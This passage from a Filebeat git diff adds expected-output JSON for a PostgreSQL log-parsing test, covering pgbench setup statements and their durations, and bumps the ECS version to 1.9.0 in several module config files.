"postgresql.log.timestamp": "2021-03-17 15:10:42.314 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.317Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2798000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6384, + "message": "2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: duration: 2.798 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.317 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.317Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6461, + "message": "2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.317 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 88800000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6562, + "message": "2021-03-17 15:10:42.406 
UTC [137] postgres@accounts LOG: duration: 88.800 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6640, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 442000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6740, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 0.442 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.406Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": 
"LOG", + "log.offset": 6817, + "message": "2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_branches add primary key (bid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.406 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.409Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2602000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6937, + "message": "2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: duration: 2.602 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.409 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.409Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7014, + "message": "2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_tellers add primary key (tid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.409 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.411Z", + "event.category": [ + 
"database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2433000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7133, + "message": "2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: duration: 2.433 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.411 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.411Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7210, + "message": "2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_accounts add primary key (aid)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.411 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.454Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 42396000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7330, + "message": "2021-03-17 15:10:42.454 UTC [137] postgres@accounts LOG: duration: 42.396 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.454 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + 
"service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.222Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7408, + "message": "2021-03-17 15:10:44.222 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:44.222 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.226Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4849000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7514, + "message": "2021-03-17 15:10:44.226 UTC [139] postgres@accounts LOG: duration: 4.849 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.226 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.228Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7591, + "message": "2021-03-17 15:10:44.228 UTC [139] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + 
"postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:10:44.228 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.231Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3311000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7759, + "message": "2021-03-17 15:10:44.231 UTC [139] postgres@accounts LOG: duration: 3.311 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.231 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.232Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7836, + "message": "2021-03-17 15:10:44.232 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:10:44.232 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.235Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3302000, + "event.kind": "event", + "event.module": "postgresql", + 
"event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7942, + "message": "2021-03-17 15:10:44.235 UTC [139] postgres@accounts LOG: duration: 3.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.235 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.236Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8019, + "message": "2021-03-17 15:10:44.236 UTC [139] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.236 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.238Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2279000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8194, + "message": "2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: duration: 2.279 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.238 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + 
"user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.238Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8271, + "message": "2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.238 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.245Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 7119000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8378, + "message": "2021-03-17 15:10:44.245 UTC [139] postgres@accounts LOG: duration: 7.119 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.245 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.248Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8455, + "message": "2021-03-17 15:10:44.248 UTC [139] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + 
"postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.248 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.250Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2267000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8634, + "message": "2021-03-17 15:10:44.250 UTC [139] postgres@accounts LOG: duration: 2.267 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.250 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.255Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8711, + "message": "2021-03-17 15:10:44.255 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:44.255 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.260Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4857000, + "event.kind": "event", + "event.module": "postgresql", + 
"event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8818, + "message": "2021-03-17 15:10:44.260 UTC [139] postgres@accounts LOG: duration: 4.857 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.260 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.263Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8895, + "message": "2021-03-17 15:10:44.263 UTC [139] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.263 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2494000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9063, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 2.494 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": 
"postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9140, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 81000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9215, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 0.081 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.265Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9292, + "message": "2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + 
"postgresql.log.timestamp": "2021-03-17 15:10:44.265 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 319000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9416, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.319 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9493, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 189000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + 
"log.offset": 9623, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.189 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9700, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9830, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + 
"event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9907, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10037, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10114, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ 
+ "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 87000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10244, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.087 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10321, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:44.266Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 109000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10451, + "message": "2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 
0.109 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:44.266 UTC", + "process.pid": 139, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + } +] \ No newline at end of file diff --git a/filebeat/module/redis/log/config/log.yml b/filebeat/module/redis/log/config/log.yml index e9de5bfce49..7ac4ecd0cc3 100644 --- a/filebeat/module/redis/log/config/log.yml +++ b/filebeat/module/redis/log/config/log.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/santa/log/config/file.yml b/filebeat/module/santa/log/config/file.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/santa/log/config/file.yml +++ b/filebeat/module/santa/log/config/file.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/system/auth/config/auth.yml b/filebeat/module/system/auth/config/auth.yml index 429067177d1..8c1811dd52d 100644 --- a/filebeat/module/system/auth/config/auth.yml +++ b/filebeat/module/system/auth/config/auth.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/system/syslog/config/syslog.yml b/filebeat/module/system/syslog/config/syslog.yml index 429067177d1..8c1811dd52d 100644 --- a/filebeat/module/system/syslog/config/syslog.yml +++ b/filebeat/module/system/syslog/config/syslog.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/traefik/access/config/traefik-access.yml b/filebeat/module/traefik/access/config/traefik-access.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/traefik/access/config/traefik-access.yml +++ b/filebeat/module/traefik/access/config/traefik-access.yml 
